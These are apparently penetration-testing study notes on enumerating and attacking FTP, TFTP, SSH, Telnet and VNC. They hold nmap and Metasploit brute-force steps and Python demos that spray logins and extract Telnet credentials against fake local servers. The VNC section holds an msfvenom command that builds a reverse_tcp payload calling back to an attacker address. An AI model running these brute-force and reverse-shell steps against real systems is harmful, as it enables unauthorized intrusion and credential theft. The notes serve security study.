- PROTOCOLS - DEFINITION, ENUMERATION AND VAPT HIERARCHY
- =======================================================
- 1. FTP
- =======
- FTP stands for File Transfer Protocol. An FTP client is a program used to move files between computers. Plain FTP carries credentials and file contents in cleartext, so anyone on the network path can read them (FTPS wraps the same protocol in TLS).
- An FTP server listens on TCP port 21 for connections from FTP clients. That port carries the control connection (commands and three-digit replies); file contents travel over a separate data connection, opened either from the server's port 20 back to the client (active mode) or from the client to a port the server advertises in its PASV reply (passive mode).
- FTP supports two transfer modes: ASCII (text) and binary (image). The mode is set in the FTP client. A common mistake is transferring a binary file (a program, an archive, a music file) in ASCII mode, which rewrites line endings and leaves the transferred file unusable.
- Enumeration via Nmap
- > nmap -Pn -sS -A -p21 TargetIP
- Attacks on FTP
- > Banner Grabbing : Reconnaissance technique that reads the greeting a service sends on connect (for FTP, the 220 reply) to learn the product and version running on an open port.
- MSF > use auxiliary/scanner/ftp/ftp_version
- > set rhosts
- > exploit
- > Brute Forcing : Trial-and-error guessing of credentials, trying username/password pairs from a wordlist until the server answers 230 (logged in) instead of 530 (rejected).
- MSF > use auxiliary/scanner/ftp/ftp_login
- > set rhosts
- > set user_file rockyou.txt
- > set pass_file rockyou.txt
- > set stop_on_success true
- > exploit
- Note: rockyou.txt is a password list; point user_file at a list of candidate usernames (anonymous, ftp, admin, service accounts from recon) or most attempts are wasted. stop_on_success stops after the first valid pair per host; watch for account lockout policies before spraying a production server.
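- The control-channel exchange that ftp_version and ftp_login perform, as an added example that is not part of the original notes and not Metasploit's code: read the 220 greeting, send USER/PASS, judge the reply code, and loop over a wordlist with stop-on-success semantics. A fake FTP server with a constructed banner and one constructed credential pair (ftpuser / Summer2023) runs in a thread on 127.0.0.1 so the whole thing works offline; the hostnames, banner and credentials are assumptions for the demo.

```python
"""FTP banner grab and login check (added example, not from the original notes).

Reply codes used: 220 greeting, 331 send password, 230 logged in, 530 rejected.
"""
import socket
import threading

FAKE_BANNER = b"220 (vsFTPd 3.0.3)\r\n"      # constructed greeting, not a real host
FAKE_CREDS = {"ftpuser": "Summer2023"}      # constructed credentials for the demo


def _serve_one(conn):
    """Minimal FTP control channel: greeting, then USER / PASS / QUIT."""
    conn.sendall(FAKE_BANNER)
    user = None
    for raw in conn.makefile("rb"):
        verb, _, arg = raw.decode("ascii", "replace").rstrip("\r\n").partition(" ")
        verb = verb.upper()
        if verb == "USER":
            user = arg
            conn.sendall(b"331 Please specify the password.\r\n")
        elif verb == "PASS":
            ok = FAKE_CREDS.get(user) == arg
            conn.sendall(b"230 Login successful.\r\n" if ok else b"530 Login incorrect.\r\n")
        elif verb == "QUIT":
            conn.sendall(b"221 Goodbye.\r\n")
            break
        else:
            conn.sendall(b"502 Command not implemented.\r\n")
    conn.close()


def start_fake_ftp():
    """Listen on an ephemeral localhost port in a daemon thread; return the port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=_serve_one, args=(conn,), daemon=True).start()

    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]


def read_reply(f):
    """Read one reply, including multi-line '220-...' blocks; return (code, last line)."""
    first = f.readline().decode("ascii", "replace")
    code = first[:3]
    last = first
    if first[3:4] == "-":                      # multi-line reply (RFC 959 section 4.2)
        while last:
            last = f.readline().decode("ascii", "replace")
            if last.startswith(code) and last[3:4] == " ":
                break
    return code, last.strip()


def ftp_banner(host, port, timeout=3.0):
    """The server speaks first: the greeting is the banner ftp_version reports."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        _, text = read_reply(s.makefile("rb"))
        return text


def ftp_login(host, port, user, password, timeout=3.0):
    """True if USER/PASS earns a 230 reply; False for 530 or anything unexpected."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("rb")
        read_reply(f)                                  # discard greeting
        s.sendall(f"USER {user}\r\n".encode())
        code, _ = read_reply(f)
        if code == "331":                              # password required
            s.sendall(f"PASS {password}\r\n".encode())
            code, _ = read_reply(f)
        s.sendall(b"QUIT\r\n")
        return code == "230"


def spray(host, port, users, passwords, stop_on_success=True):
    """ftp_login-style loop over every (user, password) pair; return the successful pairs."""
    hits = []
    for user in users:
        for password in passwords:
            if ftp_login(host, port, user, password):
                hits.append((user, password))
                if stop_on_success:
                    return hits
    return hits


def run_demo():
    """Start the fake server; return (banner, hits) for a small constructed wordlist."""
    port = start_fake_ftp()
    banner = ftp_banner("127.0.0.1", port)
    hits = spray("127.0.0.1", port, ["anonymous", "ftpuser"], ["anonymous", "Summer2023"])
    return banner, hits


if __name__ == "__main__":
    print(run_demo())
```

- A real wordlist run is the same loop with one connection per attempt, which is exactly what makes it noisy: every attempt is a full TCP handshake plus a 530 in the server log, so rate limits and lockouts are the thing to check first.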
- 2. TFTP
- =======
- TFTP stands for Trivial File Transfer Protocol. It transfers files between network devices and is a stripped-down relative of FTP.
- Today TFTP is mostly found on network gear: consumer broadband routers, commercial routers and switches, and VoIP phones that fetch their configuration at boot.
- TFTP is also used for network booting (PXE pulls the boot image over TFTP) and for backing up or restoring router and switch configuration files.
- TFTP runs over UDP, port 69. Only the first request goes to port 69: the server answers from a freshly chosen ephemeral port (its transfer ID), so a client, and any firewall rule, must accept replies from a different source port than the one it sent to.
- Differences between TFTP and FTP
- - Unlike FTP, TFTP has no authentication at all: it never prompts for a username or password, and anyone who can reach UDP 69 can read (or, if writes are enabled, overwrite) whatever the daemon serves. Avoid using TFTP for sensitive files; you can neither protect them nor audit who fetched them.
- - TFTP has no directory listing, rename or delete operations, only read (RRQ) and write (WRQ) requests. Enumeration therefore means guessing filenames (startup-config, running-config, boot images, phone config files) and seeing which requests return data instead of an error.
- Enumeration via nmap
- > nmap -Pn -sU -p69 --script tftp-enum TargetIP
- SFTP is not FTP over SSH: it is the SSH File Transfer Protocol, a separate file-transfer subsystem carried inside an SSH-2 session (normally TCP 22), so it inherits SSH's authentication and encryption. FTPS, by contrast, is classic FTP wrapped in TLS.
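- What the tftp-enum script does on the wire, as an added example that is not part of the original notes and not the Nmap script itself: build RFC 1350 packets by hand, send one read request (RRQ) per candidate filename, and classify the answer as DATA (file exists), ERROR 1 (not found) or silence. A fake TFTP daemon with a constructed two-file "filesystem" runs in a thread on 127.0.0.1 and, like a real daemon, replies from a new ephemeral port rather than the port the request went to; the filenames and file contents are assumptions for the demo.

```python
"""TFTP read-request probe (added example, not from the original notes)."""
import socket
import struct
import threading

OP_RRQ, OP_DATA, OP_ACK, OP_ERROR = 1, 3, 4, 5
ERR_NOT_FOUND = 1

# Constructed demo files served by the fake daemon (not real device configs).
FAKE_FILES = {
    "startup-config": b"hostname demo-router\nenable secret 5 $1$demo$...\n",
    "boot.cfg": b"image=demo.bin\n",
}


def build_rrq(filename, mode="octet"):
    """RRQ = opcode(2 bytes) | filename | NUL | mode | NUL."""
    return struct.pack("!H", OP_RRQ) + filename.encode() + b"\0" + mode.encode() + b"\0"


def parse_packet(pkt):
    """Return (opcode, payload): DATA -> (block, bytes); ERROR -> (code, message); ACK -> (block,)."""
    if len(pkt) < 4:
        raise ValueError("short TFTP packet")
    op, field = struct.unpack("!HH", pkt[:4])
    if op == OP_DATA:
        return op, (field, pkt[4:])
    if op == OP_ERROR:
        return op, (field, pkt[4:].split(b"\0", 1)[0].decode("ascii", "replace"))
    if op == OP_ACK:
        return op, (field,)
    return op, (pkt[2:],)


def _fake_tftpd(sock):
    """Answer RRQs the way a real daemon does: from a fresh socket (new transfer ID)."""
    while True:
        pkt, peer = sock.recvfrom(1024)
        if struct.unpack("!H", pkt[:2])[0] != OP_RRQ:
            continue
        name = pkt[2:].split(b"\0", 1)[0].decode("ascii", "replace")
        tid = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        if name in FAKE_FILES:
            tid.sendto(struct.pack("!HH", OP_DATA, 1) + FAKE_FILES[name][:512], peer)
        else:
            tid.sendto(struct.pack("!HH", OP_ERROR, ERR_NOT_FOUND) + b"File not found\0", peer)
        tid.close()


def start_fake_tftpd():
    """Bind an ephemeral localhost UDP port (a real daemon would use 69); return the port."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(("127.0.0.1", 0))
    threading.Thread(target=_fake_tftpd, args=(sock,), daemon=True).start()
    return sock.getsockname()[1]


def probe_file(host, port, filename, timeout=2.0):
    """Send one RRQ; return 'exists', 'not found', 'error <n>: <msg>' or 'no response'."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    try:
        s.sendto(build_rrq(filename), (host, port))
        try:
            pkt, src = s.recvfrom(1024)   # recvfrom, not connect(): the reply has a new source port
        except socket.timeout:
            return "no response"
        op, payload = parse_packet(pkt)
        if op == OP_DATA:
            try:  # abort the transfer so the daemon stops retransmitting block 1
                s.sendto(struct.pack("!HH", OP_ERROR, 0) + b"enumeration only\0", src)
            except OSError:
                pass
            return "exists"
        if op == OP_ERROR:
            code, msg = payload
            return "not found" if code == ERR_NOT_FOUND else f"error {code}: {msg}"
        return f"unexpected opcode {op}"
    finally:
        s.close()


def enumerate_files(host, port, names):
    """Probe every candidate name; the dict is the tftp-enum style report."""
    return {name: probe_file(host, port, name) for name in names}


def run_demo():
    port = start_fake_tftpd()
    return enumerate_files("127.0.0.1", port, ["startup-config", "running-config", "boot.cfg"])


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name:16s} {result}")
```

- Against a real device, "no response" for every name usually means a firewall is dropping the replies because they come from the daemon's transfer-ID port rather than from 69, not that the files are absent; check that before concluding the service is closed.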
- 3. SSH
- ======
- SSH stands for "Secure Shell". An SSH server listens on TCP port 22, and the protocol lets one computer open an encrypted, authenticated session to another over the internet. Network administrators use it to log in to and control servers remotely, whether the machine is across the city or across the world.
- Examples of using SSH:
- - Your email administrator needs to reboot the company email server from his home.
- - Your network administrator needs to reset your office password while she is sitting in a different office or is away on a conference.
- In short, Secure Shell (often mis-expanded as "Secure Socket Shell") is a network protocol that gives users, particularly system administrators, a secure way to access a computer over an unsecured network.
- Installing a server on Debian/Ubuntu: apt-get install openssh-server
- Enumeration using Nmap
- > nmap -Pn -sS -p22 -A TargetIP (SSH is TCP; a UDP scan (-sU) of port 22 will never find it)
- Attacks on SSH
- > Banner Grabbing
- MSF > use auxiliary/scanner/ssh/ssh_version
- > set rhosts
- > set rport
- > exploit
- > Brute Forcing on ssh login
- MSF > use auxiliary/scanner/ssh/ssh_login
- > set rhosts
- > set rport
- > set userpass_file (one "username password" pair per line; user_file and pass_file are the alternative, as with ftp_login)
- > exploit
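- What ssh_version actually reads, as an added example that is not part of the original notes and not Metasploit's code: the RFC 4253 identification string "SSH-protoversion-softwareversion SP comments CR LF", which a server may precede with other lines that must be skipped. The parser pulls out the protocol version (anything but "2.0" means SSH-1 is on the table, which is a finding in itself), the product and version, and the vendor comment field that often gives away the distribution patch level. A fake listener on 127.0.0.1 sends a constructed banner so the grab runs offline; the banner text and our own client identification string are assumptions for the demo.

```python
"""SSH identification-string grab and parse (added example, not from the original notes)."""
import re
import socket
import threading

# Constructed server output: a pre-banner line, then the identification string.
FAKE_LINES = [b"Welcome to demo-host\r\n", b"SSH-2.0-OpenSSH_7.4 Debian-10+deb9u7\r\n"]
OUR_IDENT = b"SSH-2.0-bannergrab_0.1\r\n"   # our own (constructed) client identification

_IDENT_RE = re.compile(r"^SSH-(?P<proto>[^-]+)-(?P<software>\S+)(?: (?P<comments>.*))?$")


def start_fake_sshd(lines=FAKE_LINES):
    """Accept connections on an ephemeral localhost port, send the banner lines, close."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def loop():
        while True:
            conn, _ = srv.accept()
            for line in lines:
                conn.sendall(line)
            conn.close()

    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]


def parse_ident(line):
    """Split an identification string into protocol version, software and comments."""
    m = _IDENT_RE.match(line.rstrip("\r\n"))
    if not m:
        raise ValueError(f"not an SSH identification string: {line!r}")
    proto, software = m.group("proto"), m.group("software")
    product, _, version = software.partition("_")   # OpenSSH_7.4 -> ("OpenSSH", "7.4")
    return {
        "protocol": proto,
        "software": software,
        "product": product,
        "version": version,
        "comments": m.group("comments") or "",
        # "1.99" advertises SSH-1 compatibility and "1.x" is SSH-1 only; both are findings.
        "ssh1_possible": proto != "2.0",
    }


def grab_ssh_ident(host, port, timeout=3.0, max_prebanner_lines=20):
    """Read until a line starting with 'SSH-' arrives (RFC 4253 allows other lines first)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(OUR_IDENT)   # the server expects our identification string too
        f = s.makefile("rb")
        for _ in range(max_prebanner_lines):
            raw = f.readline()
            if not raw:
                break
            line = raw.decode("utf-8", "replace")
            if line.startswith("SSH-"):
                return parse_ident(line)
    raise ValueError("no identification string received")


def run_demo():
    port = start_fake_sshd()
    return grab_ssh_ident("127.0.0.1", port)


if __name__ == "__main__":
    print(run_demo())
```

- The comments field is the part worth keeping in notes: "Debian-10+deb9u7" style suffixes pin the distribution package, which is what you need to map a bare "OpenSSH_7.4" to a backported-patch level rather than assuming every 7.4 bug applies.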
- 4. TELNET
- ==========
- Telnet is a network virtual terminal protocol, served on TCP port 23. The name comes from "teletype network," "terminal network," or "telecommunications network," depending on the source, and it was built as a form of remote control for managing mainframe computers from distant terminals.
- Telnet has been superseded by Secure Shell (SSH), which modern administrators use to manage Linux and Unix systems remotely. SSH provides strong authentication and encrypted communication between computers over an insecure network; Telnet provides neither.
- Enumeration using Nmap
- > nmap -sSV -p23 TargetIP
- Main disadvantage of using Telnet : it sends user credentials and the whole session in plaintext, so anyone who can capture traffic on the path reads the login and password directly.
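- Why "plaintext" is the whole story, as an added example that is not part of the original notes: the Telnet stream mixes option negotiation (IAC sequences, RFC 854) with the user's keystrokes, and most clients send one keystroke per packet, so recovering a login from a capture is only a matter of stripping IAC bytes, reassembling lines and pairing them with the server's prompts. The capture below is constructed by hand (the hostname, banner and credentials are made up for the demo); the same logic applied to a real pcap's TCP payloads yields the same result, which is the point.

```python
"""Credential recovery from a Telnet capture (added example, not from the original notes)."""
IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240


def strip_iac(data):
    """Remove Telnet commands and subnegotiations; keep a doubled IAC as a literal 0xFF."""
    out = bytearray()
    i = 0
    while i < len(data):
        if data[i] != IAC:
            out.append(data[i])
            i += 1
            continue
        if i + 1 >= len(data):          # dangling IAC at end of segment
            break
        cmd = data[i + 1]
        if cmd == IAC:                  # IAC IAC = literal 0xFF
            out.append(IAC)
            i += 2
        elif cmd in (DO, DONT, WILL, WONT):
            i += 3                      # IAC <cmd> <option>
        elif cmd == SB:                 # IAC SB ... IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end < 0 else end + 2
        else:
            i += 2                      # two-byte command (NOP, GA, ...)
    return bytes(out)


# Constructed capture in wire order: 'S' = server->client, 'C' = client->server.
CAPTURE = [
    ("S", bytes([IAC, DO, 1, IAC, DO, 24]) + b"\r\nUbuntu 18.04 LTS\r\ndemo-host login: "),
    ("C", bytes([IAC, WILL, 1, IAC, WONT, 24])),
    ("C", b"a"), ("C", b"d"), ("C", b"m"), ("C", b"i"), ("C", b"n"), ("C", b"\r\n"),
    ("S", b"admin\r\nPassword: "),
    ("C", b"P"), ("C", b"@"), ("C", b"ss"), ("C", b"w0rd!"), ("C", b"\r\n"),
    ("S", b"\r\nLast login: Mon Jan  1 10:00:00\r\nadmin@demo-host:~$ "),
]

PROMPTS = {b"login:": "username", b"username:": "username", b"password:": "password"}


def extract_credentials(capture):
    """Pair server prompts with the next complete client line; return the fields found."""
    found = {}
    pending = None          # which field the next client line answers
    buf = bytearray()
    for direction, payload in capture:
        text = strip_iac(payload)
        if direction == "S":
            tail = text.rstrip().lower()
            for prompt, field in PROMPTS.items():
                if tail.endswith(prompt):
                    pending, buf = field, bytearray()
            continue
        if pending is None:
            continue
        buf += text         # clients often send one keystroke per segment
        if b"\r" in buf or b"\n" in buf:
            line = bytes(buf).split(b"\r", 1)[0].split(b"\n", 1)[0]
            found[pending] = line.decode("utf-8", "replace")
            pending = None
    return found


if __name__ == "__main__":
    print(extract_credentials(CAPTURE))
```

- The same pairing logic is what a network IDS runs to flag Telnet logins on a monitored segment; on SSH the equivalent capture is ciphertext from the first key exchange onwards, so neither the prompt nor the answer is visible.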
- 5. VNC
- =======
- VNC (Virtual Network Computing) is a technology for remote desktop sharing, a form of remote access on computer networks. VNC enables the visual desktop display of one computer to be remotely viewed and controlled over a network connection.
- Remote desktop technology like VNC is useful on home computer networks, allowing someone to access their desktops from another part of the house or while traveling. It is also useful for network administrators in business environments, such as Information Technology (IT) departments who need to remotely troubleshoot employees' systems.
- Attacking Methods
- ==================
- msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.1.216 lport=44455 -f exe > vnc.exe
- --
- use exploit/multi/handler
- msf exploit(handler) > set payload windows/vncinject/reverse_tcp
- msf exploit(handler) > set lhost
- msf exploit(handler) > set lport
- msf exploit(handler) > set viewonly false
- msf exploit(handler) > run
- --------------------
- SMB ETERNAL BIBLE - https://lucideustech.blogspot.com/2017/12/the-eternal-exploitation-bible-lucideus.html